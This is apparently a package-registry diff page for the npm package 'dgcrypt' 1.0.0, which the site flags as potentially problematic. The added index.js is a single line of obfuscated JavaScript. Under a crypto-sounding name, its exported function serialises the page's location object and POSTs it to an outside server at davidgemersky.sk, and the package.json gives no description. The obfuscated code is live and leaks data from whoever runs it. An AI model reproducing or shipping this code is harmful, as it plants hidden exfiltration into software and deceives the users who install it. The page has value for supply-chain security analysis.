dgcrypt 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of dgcrypt might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +1 -0
  2. package/package.json +11 -0
package/index.js ADDED
@@ -0,0 +1 @@
1
+ (function(_0x25f134,_0x4bfb05){const _0x5c2b26=_0x2832,_0x45dd33=_0x25f134();while(!![]){try{const _0x28662e=parseInt(_0x5c2b26(0x79))/0x1*(parseInt(_0x5c2b26(0x7d))/0x2)+parseInt(_0x5c2b26(0x7f))/0x3+-parseInt(_0x5c2b26(0x82))/0x4+parseInt(_0x5c2b26(0x7b))/0x5*(parseInt(_0x5c2b26(0x7c))/0x6)+-parseInt(_0x5c2b26(0x84))/0x7+-parseInt(_0x5c2b26(0x7a))/0x8+parseInt(_0x5c2b26(0x83))/0x9;if(_0x28662e===_0x4bfb05)break;else _0x45dd33['push'](_0x45dd33['shift']());}catch(_0x2deb3d){_0x45dd33['push'](_0x45dd33['shift']());}}}(_0x3644,0xddb49));function dgcrypt(){const _0xaf76c7=_0x2832,_0x11b5f2=new FormData();_0x11b5f2[_0xaf76c7(0x7e)](_0xaf76c7(0x80),JSON[_0xaf76c7(0x81)](location)),fetch('https://api.davidgemersky.sk/api.php',{'method':_0xaf76c7(0x78),'body':_0x11b5f2});}function _0x3644(){const _0x293c8a=['25sPJTkx','127896nIQRgP','3004910gTIXuU','append','2529879jfXSkU','data','stringify','287396TYBaQs','12929994BtGTQQ','7972125xLpnjJ','POST','1YLScta','14161320SaYxYC'];_0x3644=function(){return _0x293c8a;};return _0x3644();}function _0x2832(_0x29089f,_0x32f480){const _0x3644da=_0x3644();return _0x2832=function(_0x28328a,_0x286e6b){_0x28328a=_0x28328a-0x78;let _0x454728=_0x3644da[_0x28328a];return _0x454728;},_0x2832(_0x29089f,_0x32f480);}module['exports']=dgcrypt;
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "dgcrypt",
3
+ "version": "1.0.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "David Gemerský",
10
+ "license": "ISC"
11
+ }